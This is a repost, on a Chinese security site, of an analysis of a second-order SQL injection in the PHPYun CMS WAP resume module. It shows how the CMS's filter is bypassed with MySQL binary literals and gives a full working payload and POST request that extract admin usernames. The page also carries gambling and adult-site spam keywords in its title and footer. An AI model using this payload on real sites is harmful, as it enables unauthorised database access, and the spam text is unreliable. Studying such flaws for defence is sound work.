安基網 首頁 安全 攻防案例 查看內容

雪缘园比分直播网:某php開源cms有趣的二次注入

英超雪缘园 www.trual.com.cn 2020-1-1 18:18| 投稿: xiaotiger |來自: 互聯網


免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!

摘要: 搜索公眾號:暗網黑客教程可領全套安全課程、配套攻防靶場一.漏洞說明這個漏洞涉及到了mysql中比較有意思的兩個知識點以及以table作為二次注入的突破口,非常的有意思。此cms的防注入雖然是很變態的,但是卻可以利用mysql的這兩個特點繞過防御。本次的漏洞是出現在ndex.class.php中的likejob_action() ...


一.漏洞說明

這個漏洞涉及到了mysql中比較有意思的兩個知識點以及以table作為二次注入的突破口,非常的有意思。

此cms的防注入雖然是很變態的,但是卻可以利用mysql的這兩個特點繞過防御。本次的漏洞是出現在ndex.class.php中的likejob_action()和saveresumeson_action()函數,由于這兩個函數對用戶的輸入沒有進行嚴格的顯示,同時利用mysql的特點能夠繞過waf。

PS:此漏洞的觸發需要在WAP環境下,所以在進行調試的時候需要修改瀏覽器的ua為Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Mobile Safari/537.36。

二.漏洞分析

mysql特點

特點1

傳統的插入方式可能大家想到的都是insert into test(id,content,title) values(1,'hello','hello')。

如果我們僅僅值需要插入一條記錄,則使用insert into test(content) values('hello2')。

如下圖所示:

但是實際上還存在另外一種方式能夠僅僅值插入一條記錄。

insert into test set content='hello3';

可以看到這種方式和insert into test(content) values('hello2')是一樣的。

說明插入數據時,利用values()和通過=指定列的方式結果都一樣


特點2

我們知道mysql中能夠使用十六進制表示字符串。如下:

其中0x68656c6c6f表示的就是hello

這是一個很常見的方式!

除了使用十六進制外,還可以使用二進制的方式進行插入。

hello的二進制是01101000 01100101 01101100 01101100 01101111,那么我們的SQL語句還可以這樣寫,insert into test set content=0b0110100001100101011011000110110001101111。

這種方式和insert into test(content) values (0b0110100001100101011011000110110001101111)是一樣的。

mysql不僅可以使用十六進制插入,還可以使用二進制的方式插入


waf防護分析

waf的防護是位于config/db.safety.php

其中的gpc2sql()過濾代碼如下:

function gpc2sql($str, $str2) {    if (preg_match("/select|insert|update|delete|load_file|outfile/is", $str)) {        exit(safe_pape());    }    if (preg_match("/select|insert|update|delete|load_file|outfile/is", $str2)) {        exit(safe_pape());    }    $arr = array("sleep" => "Sleep", " and " => " an d ", " or " => " Or ", "xor" => "xOr", "%20" => " ", "select" => "Select", "update" => "Update", "count" => "Count", "chr" => "Chr", "truncate" => "Truncate", "union" => "Union", "delete" => "Delete", "insert" => "Insert", """ => "“", "'" => "“", "--" => "- -", "(" => "(", ")" => ")", "00000000" => "OOOOOOOO", "0x" => "Ox");    foreach ($arr as $key => $v) {        $str = preg_replace('/' . $key . '/isU', $v, $str);    }    return $str;}

可以看到將0x替換為了Ox,所以無法傳入十六進制,但是我們卻可以利用mysql中的二進制的特點,利用0b的方式傳入我們需要的payload。


index.class.php漏洞分析

漏洞是位于wap/member/model/index.class.php中,漏洞產生的主要函數是位于likejob_action()和saveresumeson_action()中。

我們首先分析likejob_action()。

likejob_action()的主要代碼如下:

而DB_update_all()的代碼如下:

function DB_update_all($tablename, $value, $where = 1,$pecial=''){    if($pecial!=$tablename){        $where =$this->site_fetchsql($where,$tablename);    }    $SQL = "UPDATE `" . $this->def . $tablename . "` SET $value WHERE ".$where;    $this->db->query("set sql_mode=''");    $return=$this->db->query($SQL);    return $return;}

也就是說,當數據進入到DB_update_all()之后就不會有任何的過濾。

那么漏洞點就在于resume_expect中的job_classid字段。

job_classid字段的內容的傳遞如下圖所示:

所以如如果我們控制了resume_expect中的job_classid字段,我們就能夠修改這條語句了。

我們可以借助于saveresumeson_action()來向job_classid中插入我們的payload。

saveresumeson_action()的關鍵代碼如下:

可以看到$table是直接通過"resume_".$_POST['table']拼接的,這也就以為著$table是我們可控的,之后$table進入了$this->obj->update_once()中。

我們進入uptate_once()中:

$table變量在update_once()沒有進行任何的處理,直接進入到DB_update_all()中,我們追蹤進入到DB_update_all()中:

同樣沒有進行任何的處理。

通過上面的跟蹤分析,表明$table="resume_".$_POST['table'];賦值之后,中途$table變量沒有進行任何的過濾直接進入了最終的SQL語句查詢。

如此整個攻擊鏈就成功了,我們通過saveresumeson_action()中的$table可控,對resume_expect中的job_classid進行修改,之后通過likejob_action()讀取job_classid字段的內容,執行我們的SQL語句。

由于我們無法使用十六進制,此時我們就需要使用到二進制(0b)插入我們的payload。


三.漏洞復現

注冊用戶/創建簡歷

注冊用戶創建簡歷。

此時在phpyun_resume_expect中存在一條id=1的記錄。

訪問saveresumeson

我們訪問saveresumeson對應的URL,寫入我們的payload。根據語法,我們需要將table的內容設置為

expect' set class_id=1))/**/union/**/select/**/1,username,3,4,5,6,7,8,9,10,11,12/**/from/**/phpyun_admin_user #,uid=1 #

由于1))/**/union/**/select/**/1,username,3,4,5,6,7,8,9,10,11,12/**/from/**/phpyun_admin_user #無法繞過SQL的防御,需要轉化為二進制,是001100010010100100101001001011110010101000101010001011110111010101101110011010010110111101101110001011110010101000101010001011110111001101100101011011000110010101100011011101000010111100101010001010100010111100110001001011000111010101110011011001010111001001101110011000010110110101100101001011000011001100101100001101000010110000110101001011000011011000101100001101110010110000111000001011000011100100101100001100010011000000101100001100010011000100101100001100010011001000101111001010100010101000101111011001100111001001101111011011010010111100101010001010100010111101110000011010000111000001111001011101010110111001011111011000010110010001101101011010010110111001011111011101010111001101100101011100100010000000100011

那么最終的payload是:

URL://localhost/wap//member/index.php?c=saveresumeson&eid=1POST:name=java%e5%a4%a7%e6%95%b0%e6%8d%ae%e5%bc%80%e5%8f%91&sdate=2018-02&edate=2018-03&title=%e6%a0%b8%e5%bf%83%e5%bc%80%e5%8f%91%e4%ba%ba%e5%91%98&content=java%e5%a4%a7%e6%95%b0%e6%8d%ae%e5%ba%93%e5%bc%80%e5%8f%91&eid=1&id=&submit=%e4%bf%9d%e5%ad%98&table=expect%60set+job_classid%3d0b0011000100101001001010010010111100101010001010100010111101110101011011100110100101101111011011100010111100101010001010100010111101110011011001010110110001100101011000110111010000101111001010100010101000101111001100010010110001110101011100110110010101110010011011100110000101101101011001010010110000110011001011000011010000101100001101010010110000110110001011000011011100101100001110000010110000111001001011000011000100110000001011000011000100110001001011000011000100110010001011110010101000101010001011110110011001110010011011110110110100101111001010100010101000101111011100000110100001110000011110010111010101101110010111110110000101100100011011010110100101101110010111110111010101110011011001010111001000100011%2cuid%3d1+%23

此時我們執行的SQL語句是:

INSERT INTO `phpyun_resume_expect`set job_classid=0b001100010010100100101001001011110010101000101010001011110111010101101110011010010110111101101110001011110010101000101010001011110111001101100101011011000110010101100011011101000010111100101010001010100010111100110001001011000111010101110011011001010111001001101110011000010110110101100101001011000011001100101100001101000010110000110101001011000011011000101100001101110010110000111000001011000011100100101100001100010011000000101100001100010011000100101100001100010011001000101111001010100010101000101111011001100111001001101111011011010010111100101010001010100010111101110000011010000111000001111001011101010110111001011111011000010110010001101101011010010110111001011111011101010111001101100101011100100010000000100011,uid=1 #` SET

最終數據庫中多了一條記錄,如下:

我們順利地向job_classid中插入了我們的的payload


訪問likejob_action觸發payload

接下來我們訪問//localhost/member/index.php?c=likejob&id=7,其中的id就是剛剛我們插入的payload所對應記錄的id。

當運行至DB_select_all()中執行的SQL語句是:

為了便于分析,我們將這條SQL語句放入到datagrid中分析:

最終在頁面上顯示admin的信息。

至此整個漏洞都分析完畢了。


四.總結

一般來說,二次注入利用點一般都比較隱晦。

所以二次注入的思路比一般的注入更加巧妙和有意思,在本例中體現得尤為明顯。

1.這個二次注入的點比較難找,二次注入中的利用table作為二次注入的利用點的例子還是比較少見的;

2.繞過方法也比較少見。本例中的waf的防護還是比較嚴格的,利用了mysql的兩個少見特性就可以繞過了。


作者:天王蓋地虎 轉載自https://www.anquanke.com/post/id/170845




小編推薦:欲學習電腦技術、系統維護、網絡管理、編程開發和安全攻防等高端IT技術,請 點擊這里 注冊賬號,公開課頻道價值萬元IT培訓教程免費學,讓您少走彎路、事半功倍,好工作升職加薪!

本文出自:https://www.toutiao.com/a6776791284687307277/

免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!

相關閱讀

最新評論

 最新
返回頂部
{ganrao} 独行侠vs凯尔特人 1998公牛vs步行者视频 冰球突破 南昌麻将玩法 日本av女优集体姓名表 大航海时代 每日股票推荐软件推荐 18号nba掘金vs魔术土豆网 江苏十一选五玩法表 青海快3 东京热哪个最漂亮 3d今天开奖号码 日韩一本道午夜电影 川上奈奈美2019 三国杀 av女优版 云南11选5*结果